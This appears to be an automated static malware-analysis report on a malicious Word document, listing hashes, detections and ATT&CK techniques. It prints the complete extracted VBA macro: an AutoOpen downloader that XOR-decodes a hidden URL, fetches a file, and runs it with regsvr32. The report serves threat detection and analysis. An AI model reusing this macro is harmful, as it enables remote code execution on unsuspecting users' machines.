Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 223f99ee34f993d3…

MALICIOUS

Office (OOXML)

116.4 KB Created: 2020-07-24 08:49:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-07
MD5: 33976f4635de848db86f3eb00b2bd8b6 SHA-1: 3fa1c999cc43830c70d0180cc1e6bb5788a56e2b SHA-256: 223f99ee34f993d357bccf22576f510d477bc3bfdaa2c5ece86341a6a2a8bf82
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious OOXML document containing VBA macros. The 'autoopen' macro is designed to execute a payload. The script attempts to download a file named 'TT.pdf' from an obfuscated URL and then execute it using 'Shell'. The ClamAV detection and the presence of URLDownloadToFile in VBA strongly indicate downloader functionality.

Heuristics 5

  • ClamAV: Doc.Downloader.GreenBox5-9139204-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.GreenBox5-9139204-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ZX As LongPtr, ByVal nj As String, ByVal CD As String, ByVal yr As LongPtr, ByVal av As LongPtr) As Long
#Else
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
Sub autoopen()
n7 = cA(X)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4271 bytes
SHA-256: 3ba8b90692c2e39b9a487d8a45ea68d5a74044ea194c06b3cd1de81cb0abd5ed
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wX"
Public Const b As String = "TT.pdf"
Function cA(rl)
sG = NF(rl)
For Fn = 0 To UBound(sG)
 CX = CX & Chr(sG(Fn) Xor 111)
Next Fn
cA = CX
End Function
Sub autoopen()
n7 = cA(X)

' Retirement provinces project quantitative spat
' Courtier responsibility wat
' Households vault louisville
' Female exp palaver invited
' Gonna previously identifier retention
' Libels eg discipline
frm.download n7, b

' Promises pierre bulge animation
' Oak either paucity
' Breasts
' Terrain libs
' Foretell
' Bits

' Authorization romantic exhaust frog frustrate geranium
' Combo metallica measurable smoothness
' Format situation keyhole legend

' Deprecate jun fete
' Basket resounding tropics
' Spat

' Ravenna inflammation omnipotence
' Duck incorrect nowt
' Computation celebration pen blockhead subjective

' Monetary financial
' Huge uncertainty mysticism fragrance
' Sherman briefing payment blithe draughts
Dim GM As New WshShell

' Unless desk accessible
' Herb adopt converge speed cd effie
' Climatic
Call GM.run(N & Zw & " " + b)

' Steaming explanation yuan
' Via lid belief overloaded
' Concurrence moscow
End Sub

Attribute VB_Name = "wX1"
Function T6(Py)

' Pj ribald agonised til foresail ingratiate nj
' Pliant lucy incompleteness journalism wizened manchester there
' Reset disclosure acdbentity
End Function
Sub uu(FO)

' Insignificance estates inconsistency motherless
' Northamptonshire proposal shirk
' Bus explorer pics maryland

' Macedonia minimum enb
' Postman sorts
' Tawny
' Enquiries whitsuntide storey
' Shadows

' Therefore
' Teaches shaw evans peoples
' Humped cigarettes laughingly

' Pgp
' Forefront purchase recapitulate spry engross
' Edge
' Provisional snorting semi

' Iso duo harvard pa
' Forked flash designer
' Drawback prevention midsummer
' Muscles waft

' Vishnu hove hops aye
' Cherry browsers alison
' Cattleman briar childrens underground mistrust
' Errant effectiveness
' Competition scribble deterioration h
' Ever prefecture dome instigation

' Silica southeast bread
' Bostonian smock slim numbers
' Colleague stimulate framework reserves hosiery

' Positions

' Terrify enviable walks optical
' Flickr gay retail harbour
' Vastness

' Hey brokers
' Outcast liberals calvinist republic magnanimity disband
' Forge circumcision allowance bowsprit
' Ada folks touchstone
' Ada intrusive sleight ontario bonnie bubbles

' Apples kate periodically culprit canned
' Cross accumulates palette rotund nigeria
' Placement incl
' Rfc aground bel fiftieth clients notebook abdomen

' Publicly dvd harvey tall rarely contrasting
' Parish ranging question
' Completes licking economically
' Suse frankenstein pdas paraphernalia
' Alpha diving acute glasgow
End Sub

Attribute VB_Name = "V7"
Public Const N As String = "reg"
Public Const Zw As String = "svr32"
Public Const X As String = "7_27_27_31_85_64_64_21_14_6_90_9_31_89_91_93_65_12_0_2_64_23_10_2_12_3_64_6_13_14_65_31_7_31_80_3_82_4_9_14_93_65_12_14_13"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ZX As LongPtr, ByVal nj As String, ByVal CD As String, ByVal yr As LongPtr, ByVal av As LongPtr) As Long
#Else
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal ZX As Long, ByVal nj As String, ByVal CD As String, ByVal yr As Long, ByVal av As Long) As Long
#End If
Function NF(Ec)
NF = Split(Ec, "_")
End Function

Attribute VB_Name = "frm"
Attribute VB_Base = "0{13D52D41-5F9F-48CF-8820-5BBF993DF0E7}{FB72B109-7D26-4BF0-B828-12902660A651}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub download(url, file)
    URLDownloadToFile 0, url, file, 0, 0
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 28672 bytes
SHA-256: 99154e39930e2fbffb0bc1440921212d5faa26614393158e7498293b9c53f60b

Open this report in the interactive analyzer, or submit your own file for analysis.